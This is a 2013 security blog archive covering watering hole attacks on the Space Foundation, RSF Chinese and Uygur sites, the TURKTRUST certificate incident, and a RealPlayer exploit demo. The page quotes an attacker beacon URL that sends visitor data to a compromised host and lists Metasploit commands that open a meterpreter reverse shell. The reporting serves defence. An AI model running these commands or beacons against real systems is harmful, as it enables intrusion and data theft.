Yearly Archives: 2013

Forgotten Watering Hole Attacks On Space Foundation and RSF Chinese

As I announced on Twitter, this blog post presents targeted attacks that started in mid-September and were never discussed or presented in public. These attacks ended around mid-October.

The web site “arpeggio8.com“, hosted on 205.186.179.195 in the US, was compromised and used as the staging host for a watering hole attack against the Space Foundation and RSF Chinese.

The Space Foundation is a nonprofit organization that supports the global space industry through information and education programs. It is a resource for the entire space community – industry, national security organizations, civil space agencies, private space companies and the military around the world. It also supports educators, students and journalists with information and education programs.

Reporters Without Borders (RWB) is a France-based international non-governmental organization that advocates freedom of the press and freedom of information. Reporters Without Borders is also known as RSF, and RSF Chinese is its dedicated Chinese-language news web site.

The watering hole attack was built from several files and a dedicated, centralized backend named “Jsbug“.

Description of the watering hole attack

The Space Foundation and RSF Chinese web sites had a malicious JavaScript inclusion injected into their code, calling “http://www.arpeggio8.com/count/count.php“.

[Image: SpaceFoundation-RSFChinese-CVE-2012-4969]

The “count.php” script returns JavaScript that checks for the presence of a “popad” cookie and whether the browser is Internet Explorer 6, 7 or 8. The script also loads “count2.php“, which serves another purpose and is discussed later. If all the conditions are met, “rsf.php” is loaded with the parameter “id=1024“.

The “rsf.php” script only returns content if the parameter “id=1024” is present. It loads the “ie.html” file through an iframe. “rsf.php” is the equivalent of “exploit.html” in the CVE-2012-4969 0day found in mid-September.

The “ie.html” file is the equivalent of “Protect.html” in the CVE-2012-4969 0day found in mid-September, but here no Flash file is involved in the heap spray. “ie.html” contains packed JavaScript code that performs the heap spray and triggers the vulnerability. The encoded and decoded versions are available on Pastebin.

The JavaScript is decoded through the “decode” function, with the decoding key “0xe1” passed as an argument. The “int_to_hex” function checks whether Oracle Java 6 is present, whether the operating system is Windows 7 or XP and whether Internet Explorer 9 is in use. The script also gathers the browser language.

[Image: decode]

If Windows XP is in use and the language is “en-us“, “zh-cn“, “zh-tw“, “ko” or “ja” (the same kind of language filter seen in the CVE-2012-4792 attacks…), then the vulnerability is triggered.

If Windows 7 is in use and Java 6 is installed, the vulnerability is triggered (Java 6 ships a non-ASLR msvcr71.dll that the exploit can use for its ROP chain on Windows 7, which is why its presence is required there). A spray base value is also provided in the code for Internet Explorer 9, but “count.php” has already filtered the targeted browsers down to IE 6, 7 and 8, so that path is never reached.
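To make the two-stage victim selection described above concrete, here is an added example that models the gates as an analyst would reconstruct them from the description. It is not the attackers' code and not code from this blog: the profile fields (userAgent, language, cookie, hasJava6), the User-Agent parsing via the "MSIE x" and "Windows NT 5.1"/"6.1" tokens, and the stage names are my own assumptions for the model.

```javascript
// Added example: analyst's model of the count.php -> rsf.php -> ie.html gating chain.
// Not the attackers' code. Profile fields and UA parsing rules are assumptions.

// Languages accepted by the Windows XP branch of ie.html, as described in the post.
const TARGET_LANGS = ['en-us', 'zh-cn', 'zh-tw', 'ko', 'ja'];

// Read the IE major version and the Windows version the way a gating script would
// (assumption: "MSIE 8.0" and "Windows NT 5.1" style tokens in the User-Agent).
function parseUserAgent(ua) {
  const ie = /MSIE (\d+)/.exec(ua || '');
  const nt = /Windows NT (\d+\.\d+)/.exec(ua || '');
  const os = nt ? ({ '5.1': 'XP', '6.1': '7' }[nt[1]] || 'other') : 'other';
  return { ieVersion: ie ? parseInt(ie[1], 10) : null, os };
}

// Minimal "Cookie:" header parser used by the first gate.
function parseCookies(header) {
  const out = {};
  for (const part of (header || '').split(';')) {
    const [k, ...v] = part.trim().split('=');
    if (k) out[k] = v.join('=');
  }
  return out;
}

// Stage 1 (count.php): proceed only when no "popad" cookie is set and the browser
// is Internet Explorer 6, 7 or 8. Everyone else only gets the count2.php beacon.
function passesCountGate(profile) {
  if ('popad' in parseCookies(profile.cookie)) return false;
  const { ieVersion } = parseUserAgent(profile.userAgent);
  return ieVersion !== null && ieVersion >= 6 && ieVersion <= 8;
}

// Stage 2 (ie.html): trigger on Windows XP with one of five UI languages, or on
// Windows 7 when Java 6 is installed. The IE9 spray base in the file is unreachable
// because stage 1 already excluded IE9.
function passesExploitGate(profile) {
  const { os } = parseUserAgent(profile.userAgent);
  const lang = (profile.language || '').toLowerCase();
  if (os === 'XP') return TARGET_LANGS.includes(lang);
  if (os === '7') return profile.hasJava6 === true;
  return false;
}

// Walk the chain and report how far a visitor with this profile would get.
function classifyVisitor(profile) {
  if (!passesCountGate(profile)) return 'stats-only';            // count2.php beacon only
  if (!passesExploitGate(profile)) return 'exploit-page-served'; // rsf.php/ie.html loaded, no trigger
  return 'exploit-triggered';                                    // heap spray, then 917.exe
}

module.exports = { parseUserAgent, parseCookies, passesCountGate, passesExploitGate, classifyVisitor };
```

The useful point for defenders is the asymmetry: every visitor, including the analyst's Linux or Chrome sandbox, produces a beacon and a backend record, but only a narrow slice of visitors ever receives the exploit, so "I visited the page and nothing happened" is not evidence that the site is clean.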

Once the vulnerability is triggered, the “917.exe” file (MD5 6b4aa596e5a4208371942cdb0e04dfd9) is installed. This malware is detected as “Trojan-Dropper.Win32.Dapato.bscc“.

An interesting point regarding the “ie.html” file: it is dated 19 September.

[Image: rsf-ie-cve-2012-4969]

Some facts regarding CVE-2012-4969 :

  • The vulnerability was discovered being exploited in the wild, in a variant using a Flash file for the heap spray, on 14 September.
  • The Metasploit PoC was provided on 17 September.
  • Microsoft Security Advisory MSA-2757760 was published on 17 September.
  • The Microsoft patch was provided in MS12-063 on 21 September.

But as the next section shows, the attack began on 18 September, three days before the patch was available.

“count2.php” script and Jsbug backend usage

The “count2.php” script is loaded in all cases, for statistics purposes. It creates and checks two cookies, “stat_cookie” and “stat_time“, gathers the Adobe Flash version, the presence of Oracle Java and the HTTP referrer, and sends all of this information back to the same script as URL parameters:

'http://arpeggio8.com/count/count2.php?n='+Math.random()+'&action=jpg&stat_refer='+escape(location.href)+'&stat_flash='+escape(flashVer)+'&stat_java='+escape(stat_java)+'&stat_cookie='+stat_cookie+'&stat_time='+stat_time;

All of this information is stored in a backend named “Jsbug“. The backend is quite simple: only three menus, “Client statistics“, “Report” and “Create Exploit“. It has no external CSS or image files, and is typically composed of a minimum of three PHP scripts.

[Image: jsbug-backend-typical-files]

The backend's login page is equally simplistic: no page title, no text on the page. This minimalism makes it harder to discover through Google searches.

[Image: jsbug-backend-login-page]

The “Client statistics” menu leads to a summary page of all visitors who loaded “count2.php“, with OS type, browser type and version, Adobe Flash version, Oracle Java version, IP address, HTTP referer, number of visits, and first and last visit dates.

In the case of the Space Foundation watering hole attack, the first visits date from 18 September.

[Image: jsbug-space-foundation-start]

In the case of the RSF Chinese watering hole attack, the first visits date from 19 September.

[Image: jsbug-rsf-chinese-start]

These attacks have ended around mid-October.

The “Report” menu leads to a statistics page covering all visitors.

[Image: jsbug-backend-stats]

The “Create Exploit” menu is a page that helps the attackers generate their JavaScript inclusion code.

[Image: jsbug-backend-create-exploit]

CVE-2012-5691 RealPlayer RealMedia File Handling Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by auto
Coordinated public release of the vulnerability on 2012-12-14
Metasploit PoC provided on 2012-12-25

PoC provided by :

suto

Reference(s) :

CVE-2012-5691
OSVDB-88486
BID-56956
RealNetworks Security Advisory

Affected version(s) :

RealPlayer version 15.0.5.109 and below

Tested on Windows XP Pro SP3 with :

RealPlayer 15.0.5.109

Description :

This module exploits a stack based buffer overflow on RealPlayer prior or equal to 15.0.6.14. The vulnerability exists in the handling of real media files, due to the insecure usage of the GetPrivateProfileString function to retrieve the URL property from an InternetShortcut section. This module generates a malicious rm file which must be opened with RealPlayer via drag and drop or double click methods.

Commands :

use exploit/windows/fileformat/real_player_url_property_bof
set FILENAME msf.rm
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit -j

sysinfo
getuid

Fraudulent TURKTRUST Digital Certificates Used In Active Attacks

Google, Microsoft and Mozilla have released alerts regarding active attacks using fraudulent digital certificates issued by TURKTRUST, a Turkish certificate authority and a subsidiary of the Turkish Armed Forces ELELE Foundation Company.

Google's alert states that on 24 December they detected and blocked an unauthorized digital certificate for the “*.google.com” domain. This certificate was issued by an intermediate certificate authority (CA) linked to TURKTRUST. After investigation, in collaboration with TURKTRUST, it appeared that a second intermediate CA certificate had also been wrongly issued. Google Chrome's certificate revocation list was updated on 26 December to block both fraudulent intermediate CAs.

Microsoft has released Security Advisory MSA-2798897, which affects all supported releases of Microsoft Windows. Microsoft is updating the Certificate Trust List and providing an update for all supported releases of Microsoft Windows that removes these fraudulent certificates. Systems running Windows 8, Windows RT, Windows Server 2012, and devices running Windows Phone 8 are updated and protected automatically.

The following certificates will be added to the Untrusted Certificates folder:

  • Certificate “*.google.com” issued by “*.EGO.GOV.TR” with thumbprint “4d 85 47 b7 f8 64 13 2a 7f 62 d9 b7 5b 06 85 21 f1 0b 68 e3“.
  • Certificate “e-islem.kktcmerkezbankasi.org” issued by “TURKTRUST Elektronik Sunucu Sertifikasi Hizmetleri” with thumbprint “f9 2b e5 26 6c c0 5d b2 dc 0d c3 f2 dc 74 e0 2d ef d9 49 cb“.
  • Certificate “*.EGO.GOV.TR” issued by “TURKTRUST Elektronik Sunucu Sertifikasi Hizmetleri” with thumbprint “c6 9f 28 c8 25 13 9e 65 a6 46 c4 34 ac a5 a1 d2 00 29 5d b1“.

Mozilla has released a Security Blog post and taken a different position from Google and Microsoft. The foundation will actively revoke trust for the two fraudulent certificates, but will also suspend inclusion of the “TÜRKTRUST Bilgi İletişim ve Bilişim Güvenliği Hizmetleri A.Ş. (c) Aralık 2007” root certificate, pending further review. A new release of Firefox will ship on Tuesday 8 January.

These fraudulent certificates could be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks, so we advise you to update as soon as possible.

Chinese Uygur Minority Also Targeted in the CFR Watering Hole Attack And More

In my last blog post I reported that the watering hole attack involving an Internet Explorer 0day (CVE-2012-4792) was not limited to CFR.org but also hit the energy manufacturer Capstone Turbine Corp. I also confirmed that the attack started at least as early as the beginning of December, and that some of these infected web sites had previously been infected with another Internet Explorer 0day discovered in September 2012.

After some additional research I found two more web sites involved in the watering hole attack.

PHIL-AM Tour (http://www.philam.com.tw)

This web site, a Taiwanese travel agency, was found infected through a Google dork. The “Helps.html” page is still in the Google cache, but the web site has since been cleaned. The source code of the infected page is on Pastebin. The page was also analyzed through jsunpack on 31 December.

[Image: philam.com.tw-hello]
Uygur Haber Ajansi (www.uygurunsesi.com)

This web site, a dissident Uygur news site, was found infected through a Google dork and the “Helps.html” page is still live, so take care if you visit it: you could be infected. Uygurs are a Turkic ethnic group living in Eastern and Central Asia. Today, Uyghurs live primarily in the Xinjiang Uyghur Autonomous Region of the People’s Republic of China.

[Image: uygurunsesi.com-hello]

As with the Capstone Turbine Corp. web site, this site had also previously been infected with the CVE-2012-4969 exploit I discovered in September: “Grumgog.swf” is in the house.

[Image: uygurunsesi.com-grumgog]
Samples collected on this web site:

  • robots.txt (96b01d14892435ae031290cd58d85c2e)
  • today.swf (4df26a39734992ff7a8d95cc44542b2b)
  • xsainfo.jpg (7c713c44e34fa8e63745744e3b7221db)
  • news.html (76d14311bae24a40816e3832b1421dee)
  • Helps.html (a25c13d4edb207e6ce153469c1104223)